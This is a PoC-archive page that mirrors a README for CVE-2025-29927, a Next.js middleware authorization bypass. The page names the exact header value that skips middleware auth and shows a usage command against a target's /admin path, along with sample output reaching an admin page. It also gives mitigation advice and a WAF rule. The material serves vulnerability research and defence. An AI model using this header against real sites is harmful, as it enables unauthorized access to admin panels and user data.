Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
https://github.com/w2hcorp/CVE-2025-29927-PoC
Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
Here is a simple but effective exploit for CVE-2025-29927.
Readme
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)

This repository contains a Proof of Concept (PoC) exploit for **CVE-2025-29927**, a critical vulnerability in **Next.js** that allows attackers to bypass authorization checks by abusing a middleware-specific HTTP header.

---

## Overview

- **CVE ID:** CVE-2025-29927  
- **Severity:** Critical (CVSS 9.1)  
- **Affected Framework:** [Next.js](https://nextjs.org/)  
- **Vulnerability Type:** Authorization Bypass  
- **Exploitation Vector:** HTTP Request Header  
- **Exploit Complexity:** Low  
- **Authentication Required:** No  

---

## About the Vulnerability

Next.js applications often rely on middleware for authorization and access control. This CVE arises from a logic flaw in how the `x-middleware-subrequest` header is processed. When this header is set to `middleware`, the server may incorrectly assume the request originated from internal logic and **bypass middleware-based auth**.

> This can allow attackers to access admin panels, protected APIs, or user data — with **no credentials or valid session.**

---

## PoC Exploit

We provide a simple Python script to test whether a Next.js application is vulnerable.

### ▶️ Usage

```bash
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
```

## Sample Output
```
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...
```

## Dependencies

- Python 3.6+
- requests library

## Mitigation

- Upgrade to the latest patched version of Next.js.
- Avoid using x-middleware-subrequest as a trust signal.
- Implement server-side session validation and proper authorization checks in protected routes.
- Consider adding WAF/IDS rules to block or flag suspicious use of this header.

WAF Logic: 

```
if header 'x-middleware-subrequest' == 'middleware':
    block_request()
```

## Disclosure & Credits

This PoC was developed by the Offensive Security Team at W2H Corp. as part of our continuous vulnerability research efforts. The original post for the CVE explanation is [here](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware).
File Snapshot

 [4.0K]  /data/pocs/c5f406cd5b7c2d9496742470a691b5cd0bede627
├── [1.4K]  cve-2025-29927-poc.py
└── [2.3K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →